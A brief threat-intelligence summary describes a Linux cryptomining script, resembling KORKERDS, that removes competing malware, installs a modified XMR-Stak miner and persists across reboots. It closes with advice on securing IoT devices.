Linux Coin Miner Copied Scripts From KORKERDS, Removes All Other Malware and Miners (Feb 8, 2019)
Researchers from Trend Micro found a script on one of their honeypots that was downloading and installing a cryptocurrency mining malware onto a Linux system. The script is capable of killing and/or deleting a number of known Linux malware, cryptominers, and connections to other miner services and ports, and after installing its own malware, it implants itself into the machine's system to survive rebooting and deletion. The script appears to be similar to the "KORKERDS" malware, but is notably different in that this malware does not install a rootkit or uninstall antivirus software, as well as this new malware has KORKERDS in its kill list. The observed script downloads a modified version of the "XMR-Stak" cryptominer that mines for Cryptonight cryptocurrency. The infection source appears to have started from some IP cameras and web services via TCP port 8161.
Recommendation: If a device is Internet-of-Things (IoT), it is recommended that it is placed behind a firewall or network address translation and placed within a Virtual Local Area Network (VLAN). Change the default password of IoT devices such as routers and printers to something that is difficult for threat actors to guess, but memorable for you. Anything that faces the internet can be vulnerable to threat actors, and malware can evolve extremely quickly so it is crucial to stay up-to-date with security patches and updates.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.